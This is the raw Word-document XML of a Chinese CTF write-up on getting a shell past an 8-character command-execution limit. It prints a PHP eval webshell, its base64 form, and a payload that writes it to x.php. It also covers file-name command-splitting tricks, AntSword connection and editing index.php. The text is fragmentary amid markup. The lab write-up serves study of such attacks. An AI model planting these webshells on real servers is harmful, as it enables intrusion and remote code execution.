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2686050"/>
            <wp:effectExtent l="0" t="0" r="4445" b="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Getshell 的一道题目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264535"/>
            <wp:effectExtent l="0" t="0" r="5080" b="12065"/>
            <wp:docPr id="2" name="图片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代码审计，这是将一个字符串（小于8位）作为shell执行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先ls看看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994150"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635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没有想象中的flag,说明在其他文件夹下，可是我们要查早文件坑定不止8位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结合题目，我这里用到的是shell反弹来实现任意代码执行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预备知识：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&gt;a    #虽然没有输入但是会创建a这个文件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ls -t    #ls基于基于事件排序（从晚到早）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sh a    #sh会把a里面的每行内容当作命令来执行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使用|进行命令拼接    #l\ s    =    ls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base64    #使用base64编码避免特殊字符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我的思路是写一个一句话木马进去，所以我们最终要创建一个包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php eval($_POST[aaa]);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的.php文件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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&lt;?php eval($_POST[aaa]);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进行base64编码避免特殊字符的过滤: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编码后:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PD9waHAgZXZhbCgkX1BPU1RbYWFhXSk7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我的payload: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PD9waHAgZXZhbCgkX1BPU1RbYWFhXSk7|base64 -d&gt;x.php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利用shell反弹的原理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747135"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715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创建一个txt，多次注入以绕过8位限制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111500"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270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运行代码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495800" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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成功后用我们的shell管理工具连接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我用的蚁剑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3752215"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="3" name="图片 3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75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进入后台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411855"/>
            <wp:effectExtent l="0" t="0" r="3175" b="17145"/>
            <wp:docPr id="5" name="图片 5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打开index.php，后我们将8改为8000,这样就可以想怎么解怎么解了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580640"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10160"/>
            <wp:docPr id="9" name="图片 9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回到网页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可以发现已经变了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161155"/>
            <wp:effectExtent l="0" t="0" r="7620" b="10795"/>
            <wp:docPr id="11" name="图片 11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我们用find命令查找一下我们想要找的文件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2268220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="17780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F12 看的清楚点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985010"/>
            <wp:effectExtent l="0" t="0" r="5080" b="15240"/>
            <wp:docPr id="14" name="图片 14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一个个找把。。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570480"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="15" name="图片 15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不过不出所料第一个就是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flag{intrasting_getshell}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学会了shell反弹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以及对应脚本的编写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44C55"/>
    <w:rsid w:val="1CA95DB1"/>
    <w:rsid w:val="7A1F2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customXml" Target="../customXml/item1.xml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2021-07-11T08:24:00Z</dcterms:created>
  <dc:creator>ASUS</dc:creator>
  <cp:lastModifiedBy>ASUS</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-11T09:47:29Z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